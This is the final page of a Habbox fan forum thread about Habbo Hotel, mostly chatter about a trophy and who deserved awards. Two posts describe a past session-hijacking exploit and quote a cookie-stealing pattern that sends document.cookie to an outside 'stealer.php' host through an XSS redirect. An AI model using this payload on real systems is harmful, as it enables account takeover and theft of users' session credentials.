Discover Habbo's history
Treat yourself with a Secret Santa gift.... of a random Wiki page for you to start exploring Habbo's history!
Happy holidays!
Celebrate with us at Habbox on the hotel, on our Forum and right here!
Join Habbox!
One of us! One of us! Click here to see the roles you could take as part of the Habbox community!


Page 11 of 11 FirstFirst ... 7891011
Results 101 to 106 of 106
  1. #101
    Join Date
    Mar 2008
    Posts
    138
    Tokens
    0

    Default

    Quote Originally Posted by leahhh View Post
    They got a throphy aswell !
    i dont remember anyone saying about a trophy...
    I'm with stupid :arrow: :rolleyes:

  2. #102
    Join Date
    Mar 2008
    Posts
    459
    Tokens
    50

    Default

    Quote Originally Posted by InfoStructure View Post
    i dont remember anyone saying about a trophy...

  3. #103
    Join Date
    Jun 2008
    Location
    Manchester
    Posts
    766
    Tokens
    0

    Default

    Quote Originally Posted by Kent View Post
    It was with the Javascript session Id given to each user when they sign/log in. You direct a person to a website and it sends you their javascript session id allowing you to use it on habbo and yours their ID for you to sign into their account. It only worked if the habbo had been logged in for 20 minutes or less or it would time-out (expire).
    If they expired you can edit homepage, post comments etc.

    For your other question, you can no longer exploit it due to the ID being hidden. It wasn't a fake login, if you directed someone to the site it automatically gave you an ID, they couldn't prevent it.
    I thought the reason it was patched was because there aren't any more XSS exploits on habbo.co.uk to redirect the person to a session stealer (it only works if the user is redirected to http://name.freehost.com/folder/stealer.php?cookie= + document.cookie straight from habbo.co.uk).

    Also isn't is a php session id rather that a javascript session id? Hence 'PHPSESSID=blahblah'.

  4. #104
    Join Date
    Jul 2006
    Location
    system32
    Posts
    305
    Tokens
    0

    Default

    Quote Originally Posted by Unhappyness View Post
    I thought the reason it was patched was because there aren't any more XSS exploits on habbo.co.uk to redirect the person to a session stealer (it only works if the user is redirected to http://name.freehost.com/folder/stealer.php?cookie= + document.cookie straight from habbo.co.uk).

    Also isn't is a php session id rather that a javascript session id? Hence 'PHPSESSID=blahblah'.
    No it's 'JSESSIONID='

  5. #105
    Join Date
    Apr 2008
    Location
    Derby
    Posts
    4,668
    Tokens
    262

    Latest Awards:

    Default

    MissAlice and Bill are the only two i think trul deserved it!
    Back for a while

  6. #106
    Join Date
    Dec 2007
    Location
    South Wales
    Posts
    8,753
    Tokens
    3,746

    Latest Awards:

    Default

    Quote Originally Posted by leahhh View Post
    WHAT A SKEM
    thanks for screeny


    Quote Originally Posted by KnownSinner View Post
    MissAlice and Bill are the only two i think trul deserved it!
    there are a few others..
    "There are only two important days in your life: the day you are born, and the day you find out why."
    Mark Twain


Page 11 of 11 FirstFirst ... 7891011

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •